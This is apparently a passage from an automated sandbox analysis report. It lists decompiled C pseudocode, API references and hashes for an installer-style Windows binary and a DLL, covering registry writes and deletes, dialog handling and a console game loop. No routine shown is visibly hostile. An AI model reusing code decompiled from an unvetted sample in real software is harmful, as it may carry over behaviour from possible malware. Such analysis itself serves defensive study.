                                                                                                  0x100010f6
                                                                                                  0x100010f9
                                                                                                  0x10001112
                                                                                                  0x1000111d
                                                                                                  0x10001125
                                                                                                  0x1000112d
                                                                                                  0x10001133

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.235460951.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.235453419.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.235467539.0000000010002000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.235472130.0000000010003000.00000040.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.235488746.0000000010005000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: ConsoleCursorHandlePosition_getch_printfexit
                                                                                                  • String ID: Game Draw
                                                                                                  • API String ID: 2945803984-3265694624
                                                                                                  • Opcode ID: 08cc9d3747876e57dbf9f12d13a1dd0fd919f660a19213ca8aac68ad53072683
                                                                                                  • Instruction ID: 7f86a1bc56cf6df7890533edaa720a2800b1fa09b60be95265b06f4c224d7dc9
                                                                                                  • Opcode Fuzzy Hash: 08cc9d3747876e57dbf9f12d13a1dd0fd919f660a19213ca8aac68ad53072683
                                                                                                  • Instruction Fuzzy Hash: 8DD012B5800320DBFA019B908FCD7193BA8FB0C3C2F104605F312C147ACB719004CB26
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00402336, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 90%
                                                                                                  			E00402336(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402B1E(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x18));
				 *(_t37 - 0x34) =  *(_t37 - 0x14);
				 *(_t37 - 0x38) = E00402A29(2);
				_t18 = E00402A29(0x11);
				_t31 =  *0x7a2850 | 0x00000002;
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27,  *0x7a2850 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t35 == 1) {
						E00402A29(0x23);
						_t19 = lstrlenA(0x40a430) + 1;
					}
					if(_t35 == 4) {
						_t24 = E00402A0C(3);
						 *0x40a430 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402F4E(_t31,  *((intOrPtr*)(_t37 - 0x1c)), _t27, 0x40a430, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x38), _t27,  *(_t37 - 0x34), 0x40a430, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x7a2828 =  *0x7a2828 +  *(_t37 - 4);
				return 0;
			}










                                                                                                  0x00402337
                                                                                                  0x0040233c
                                                                                                  0x00402346
                                                                                                  0x00402350
                                                                                                  0x00402353
                                                                                                  0x00402363
                                                                                                  0x0040236d
                                                                                                  0x00402374
                                                                                                  0x0040237c
                                                                                                  0x0040238a
                                                                                                  0x0040238e
                                                                                                  0x00402399
                                                                                                  0x00402399
                                                                                                  0x0040239d
                                                                                                  0x004023a1
                                                                                                  0x004023a7
                                                                                                  0x004023ac
                                                                                                  0x004023ac
                                                                                                  0x004023b0
                                                                                                  0x004023bc
                                                                                                  0x004023bc
                                                                                                  0x004023d5
                                                                                                  0x004023d7
                                                                                                  0x004023d7
                                                                                                  0x004023da
                                                                                                  0x004024b0
                                                                                                  0x004024b0
                                                                                                  0x004028c1
                                                                                                  0x004028cd

                                                                                                  APIs
                                                                                                  • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402374
                                                                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nssBDFE.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402394
                                                                                                  • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nssBDFE.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CD
                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nssBDFE.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024B0
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: CloseCreateValuelstrlen
                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nssBDFE.tmp
                                                                                                  • API String ID: 1356686001-1451364421
                                                                                                  • Opcode ID: 0799274cdccd58945ada5092e48339c69ac5974a051479cf60ecbd445f06ba6f
                                                                                                  • Instruction ID: 3349b4e08413610a29dfd3a1d4734fa3136aed4631e94ee9e9a992f937961cdc
                                                                                                  • Opcode Fuzzy Hash: 0799274cdccd58945ada5092e48339c69ac5974a051479cf60ecbd445f06ba6f
                                                                                                  • Instruction Fuzzy Hash: 0611AF71E00208BEEB11EFA5DE89EAF7A78EB44758F20403AF505B71D1C6BC5D019B69
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00402A69, Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 84%
                                                                                                  			E00402A69(void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				char _v272;
				long _t18;
				intOrPtr* _t27;
				long _t28;

				_t18 = RegOpenKeyExA(_a4, _a8, 0,  *0x7a2850 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							return 1;
						}
						if(E00402A69(_v8,  &_v272, 0) != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E004060B4(4);
					if(_t27 == 0) {
						if( *0x7a2850 != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x7a2850, 0);
				}
				return _t18;
			}








                                                                                                  0x00402a8a
                                                                                                  0x00402a92
                                                                                                  0x00402aba
                                                                                                  0x00402aa4
                                                                                                  0x00402af4
                                                                                                  0x00402afa
                                                                                                  0x00000000
                                                                                                  0x00402afc
                                                                                                  0x00402ab8
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00402ab8
                                                                                                  0x00402acf
                                                                                                  0x00402ad7
                                                                                                  0x00402ade
                                                                                                  0x00402b0a
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00402b12
                                                                                                  0x00402b1a
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00402b1a
                                                                                                  0x00000000
                                                                                                  0x00402aed
                                                                                                  0x00402b01

                                                                                                  APIs
                                                                                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A8A
                                                                                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AC6
                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00402ACF
                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00402AF4
                                                                                                  • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B12
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: Close$DeleteEnumOpen
                                                                                                  • String ID:
                                                                                                  • API String ID: 1912718029-0
                                                                                                  • Opcode ID: 005aa08e09fa2f9c52acd8c6437f754bb1c3413ee6afae27746e5cf1dc3646d6
                                                                                                  • Instruction ID: 394a2bb0538aac42cd1eb94d6c751ba431b5215abe904c7dfb851c8138e3e268
                                                                                                  • Opcode Fuzzy Hash: 005aa08e09fa2f9c52acd8c6437f754bb1c3413ee6afae27746e5cf1dc3646d6
                                                                                                  • Instruction Fuzzy Hash: 18114C71600049FFDF21AF94DE88DAB3BB9FB44344B104076FA05A11A0DBB89E51BF69
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00401CDE, Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00401CDE(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8), __edx);
				GetClientRect(_t25, _t27 - 0x50);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E00402A29(_t21), _t21,  *(_t27 - 0x48) *  *(_t27 - 0x20),  *(_t27 - 0x44) *  *(_t27 - 0x20), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x7a2828 =  *0x7a2828 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                                                                                                  0x00401ce8
                                                                                                  0x00401cef
                                                                                                  0x00401d1e
                                                                                                  0x00401d26
                                                                                                  0x00401d2d
                                                                                                  0x00401d2d
                                                                                                  0x004028c1
                                                                                                  0x004028cd

                                                                                                  APIs
                                                                                                  • GetDlgItem.USER32 ref: 00401CE2
                                                                                                  • GetClientRect.USER32 ref: 00401CEF
                                                                                                  • LoadImageA.USER32 ref: 00401D10
                                                                                                  • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
                                                                                                  • DeleteObject.GDI32(00000000), ref: 00401D2D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                  • String ID:
                                                                                                  • API String ID: 1849352358-0
                                                                                                  • Opcode ID: 9db6bf3c7710e3760e37a38e8ca944551d0cf4879471460eea63859595bb1064
                                                                                                  • Instruction ID: f357bcee20db6ba17ef42ec5628d3685bdee74f64b72a6fb3616790656fe102c
                                                                                                  • Opcode Fuzzy Hash: 9db6bf3c7710e3760e37a38e8ca944551d0cf4879471460eea63859595bb1064
                                                                                                  • Instruction Fuzzy Hash: 9BF0EC72A04118AFDB01EBA4DE88DAFB7BCEB49315B14442AF501F6191C7789D019B79
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 004058AB, Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 36COMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 100%
                                                                                                  			E004058AB(char _a4) {
				CHAR* _t3;
				char* _t5;
				CHAR* _t7;
				CHAR* _t8;
				void* _t10;

				_t1 =  &_a4; // 0x40565d
				_t8 =  *_t1;
				_t7 = CharNextA(_t8);
				_t3 = CharNextA(_t7);
				if( *_t8 == 0 ||  *_t7 != 0x5c3a) {
					if( *_t8 != 0x5c5c) {
						L8:
						return 0;
					}
					_t10 = 2;
					while(1) {
						_t10 = _t10 - 1;
						_t5 = E00405842(_t3, 0x5c);
						if( *_t5 == 0) {
							goto L8;
						}
						_t3 = _t5 + 1;
						if(_t10 != 0) {
							continue;
						}
						return _t3;
					}
					goto L8;
				} else {
					return CharNextA(_t3);
				}
			}








                                                                                                  0x004058b4
                                                                                                  0x004058b4
                                                                                                  0x004058bb
                                                                                                  0x004058be
                                                                                                  0x004058c3
                                                                                                  0x004058d6
                                                                                                  0x004058f0
                                                                                                  0x00000000
                                                                                                  0x004058f0
                                                                                                  0x004058da
                                                                                                  0x004058db
                                                                                                  0x004058de
                                                                                                  0x004058df
                                                                                                  0x004058e7
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x004058e9
                                                                                                  0x004058ec
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x004058ec
                                                                                                  0x00000000
                                                                                                  0x004058cc
                                                                                                  0x00000000
                                                                                                  0x004058cd

                                                                                                  APIs
                                                                                                  • CharNextA.USER32(]V@,?,C:\Users\user\AppData\Local\Temp\nssBDFE.tmp,00000000,0040590F,C:\Users\user\AppData\Local\Temp\nssBDFE.tmp,C:\Users\user\AppData\Local\Temp\nssBDFE.tmp,?,?,7519F560,0040565D,?,C:\Users\user\AppData\Local\Temp\,7519F560), ref: 004058B9
                                                                                                  • CharNextA.USER32(00000000), ref: 004058BE
                                                                                                  • CharNextA.USER32(00000000), ref: 004058CD
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: CharNext
                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nssBDFE.tmp$]V@
                                                                                                  • API String ID: 3213498283-3407668387
                                                                                                  • Opcode ID: 821b75fc0c0bf8a8a2143e6ed4d527e8d42290358c57660450d09f70a8aefd19
                                                                                                  • Instruction ID: 4d129233157b146d8e872c92a1fb7bbd55967a494d67b6c0b16af7eb119e1d1b
                                                                                                  • Opcode Fuzzy Hash: 821b75fc0c0bf8a8a2143e6ed4d527e8d42290358c57660450d09f70a8aefd19
                                                                                                  • Instruction Fuzzy Hash: 8FF0AE53904B215AD72272544C48B67679CDF59710F148477ED01761D1C7784C62DFAA
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 004047D5, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 77%
                                                                                                  			E004047D5(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E00405D46(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E00405D46(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E00405D46(_t41, _t47, 0x79eda0, 0x79eda0, _a8);
				wsprintfA(_t32 + lstrlenA(0x79eda0), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x7a1f78, _a4, 0x79eda0);
			}



















                                                                                                  0x004047db
                                                                                                  0x004047e0
                                                                                                  0x004047e8
                                                                                                  0x004047e9
                                                                                                  0x004047f6
                                                                                                  0x004047fe
                                                                                                  0x004047ff
                                                                                                  0x00404801
                                                                                                  0x00404803
                                                                                                  0x00404805
                                                                                                  0x00404808
                                                                                                  0x00404808
                                                                                                  0x0040480f
                                                                                                  0x00404815
                                                                                                  0x00404815
                                                                                                  0x0040481c
                                                                                                  0x00404823
                                                                                                  0x00404826
                                                                                                  0x00404829
                                                                                                  0x00404829
                                                                                                  0x0040482d
                                                                                                  0x0040483d
                                                                                                  0x0040483f
                                                                                                  0x00404842
                                                                                                  0x004047eb
                                                                                                  0x004047eb
                                                                                                  0x004047f2
                                                                                                  0x004047f2
                                                                                                  0x0040484a
                                                                                                  0x00404855
                                                                                                  0x0040486b
                                                                                                  0x0040487b
                                                                                                  0x00404897

                                                                                                  APIs
                                                                                                  • lstrlenA.KERNEL32(0079EDA0,0079EDA0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004046F0,000000DF,00000000,00000400,?), ref: 00404873
                                                                                                  • wsprintfA.USER32 ref: 0040487B
                                                                                                  • SetDlgItemTextA.USER32 ref: 0040488E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: ItemTextlstrlenwsprintf
                                                                                                  • String ID: %u.%u%s%s
                                                                                                  • API String ID: 3540041739-3551169577
                                                                                                  • Opcode ID: 166d137e0e59de8ba4af0be59264fec3128c6706bff2ec62916a8c3abc91789b
                                                                                                  • Instruction ID: c818b1e70858d91ccef1adc2f5c344326f749079c396b39bf243287ce07d4cbc
                                                                                                  • Opcode Fuzzy Hash: 166d137e0e59de8ba4af0be59264fec3128c6706bff2ec62916a8c3abc91789b
                                                                                                  • Instruction Fuzzy Hash: FF110D73A041283BDB00656D9C45EAF3299DF82374F254637FA25F71D1E978CC1285E8
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00401BCA, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 51%
                                                                                                  			E00401BCA() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 8) = E00402A0C(3);
				 *(_t55 + 8) = E00402A0C(4);
				if(( *(_t55 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402A29(0x33);
				}
				__eflags =  *(_t55 - 0x14) & 0x00000002;
				if(( *(_t55 - 0x14) & 0x00000002) != 0) {
					 *(_t55 + 8) = E00402A29(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E00402A29();
					_t28 = E00402A29();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 8),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E00402A0C();
					_t37 = E00402A0C();
					_t48 =  *(_t55 - 0x14) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8));
						L10:
						 *(_t55 - 0xc) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8), _t42, _t48, _t55 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x28)) >= _t42) {
					_push( *(_t55 - 0xc));
					E00405C82();
				}
				 *0x7a2828 =  *0x7a2828 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}












                                                                                                  0x00401bd3
                                                                                                  0x00401bdf
                                                                                                  0x00401be2
                                                                                                  0x00401beb
                                                                                                  0x00401beb
                                                                                                  0x00401bee
                                                                                                  0x00401bf2
                                                                                                  0x00401bfb
                                                                                                  0x00401bfb
                                                                                                  0x00401bfe
                                                                                                  0x00401c02
                                                                                                  0x00401c04
                                                                                                  0x00401c51
                                                                                                  0x00401c53
                                                                                                  0x00401c5c
                                                                                                  0x00401c64
                                                                                                  0x00401c67
                                                                                                  0x00401c67
                                                                                                  0x00401c70
                                                                                                  0x00000000
                                                                                                  0x00401c06
                                                                                                  0x00401c0d
                                                                                                  0x00401c0f
                                                                                                  0x00401c17
                                                                                                  0x00401c1a
                                                                                                  0x00401c42
                                                                                                  0x00401c76
                                                                                                  0x00401c76
                                                                                                  0x00401c1c
                                                                                                  0x00401c2a
                                                                                                  0x00401c32
                                                                                                  0x00401c35
                                                                                                  0x00401c35
                                                                                                  0x00401c1a
                                                                                                  0x00401c79
                                                                                                  0x00401c7c
                                                                                                  0x00401c82
                                                                                                  0x00402866
                                                                                                  0x00402866
                                                                                                  0x004028c1
                                                                                                  0x004028cd

                                                                                                  APIs
                                                                                                  • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                                                  • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$Timeout
                                                                                                  • String ID: !
                                                                                                  • API String ID: 1777923405-2657877971
                                                                                                  • Opcode ID: 22602105ab14657b2362ab5c47f3abd445806e463df63d8c41bd3ddf5184478f
                                                                                                  • Instruction ID: b8410fb8c8eb49779d085b48b9517962e6f6c5e8148992f4dbb50a9136c29d8e
                                                                                                  • Opcode Fuzzy Hash: 22602105ab14657b2362ab5c47f3abd445806e463df63d8c41bd3ddf5184478f
                                                                                                  • Instruction Fuzzy Hash: 9A21A471A44149BEEF029FF4C94AAEE7B75DF44704F10407EF501B61D1DAB88540DB29
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 10001780, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51COMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 61%
                                                                                                  			E10001780(void* __eflags) {
				signed int _v8;
				void* _t12;
				signed int _t13;
				void* _t21;
				signed int _t22;
				signed int _t23;
				signed int _t26;
				signed int _t31;
				intOrPtr _t47;
				signed int _t49;
				signed int _t52;
				signed int _t57;
				signed int _t59;
				void* _t64;
				void* _t65;
				void* _t66;

				_t12 = E10001530( *0x10004b38);
				_t65 = _t64 + 4;
				if(_t12 == 0) {
					_t13 = E10001530( *0x10004b3c);
					_t65 = _t65 + 4;
					__eflags = _t13;
					if(_t13 == 0) {
						_t13 = E100012A0();
						__eflags = _t13;
						if(_t13 == 0) {
							_t13 = E100012F0();
						}
					}
					_t57 =  *0x10003028; // 0x1
					_t49 = _t57 & 0x80000001;
					__eflags = _t49;
					if(_t49 < 0) {
						_t49 = (_t49 - 0x00000001 | 0xfffffffe) + 1;
						__eflags = _t49;
					}
				} else {
					__edx =  *0x10003028; // 0x1
					__ecx = __edx;
					__ecx = __edx & 0x80000001;
					__eflags = __ecx;
					if(__ecx < 0) {
						__ecx = __ecx - 1;
						__ecx = __ecx | 0xfffffffe;
						__eflags = __ecx;
					}
					 *0x10004b20 = 1;
				}
				asm("sbb ecx, ecx");
				 *0x10003028 = _t57 + 1;
				_t47 = ( ~_t49 & 0xfffffffe) + 5;
				 *((intOrPtr*)(0x10003000 + _t13 * 4)) = _t47;
				E10001140();
				__eflags =  *0x10004b20;
				if( *0x10004b20 == 0) {
					_push(_t47);
					if( *0x10003028 <= 9) {
						L4:
						E10001140();
						0x10004b24->X = 0x12001e;
						SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0x10004b24->X);
						E10001690("Your Turn :> ", _t59);
						E10001750("%d",  &_v8);
						_t59 = _v8;
						_t66 = _t65 + 0xc;
						if( *(0x10003000 + _t59 * 4) != 2) {
							L1();
							_t59 = _v8;
						}
						_t21 = E10001530( *0x10004b3c);
						_t52 =  *0x10003028; // 0x1
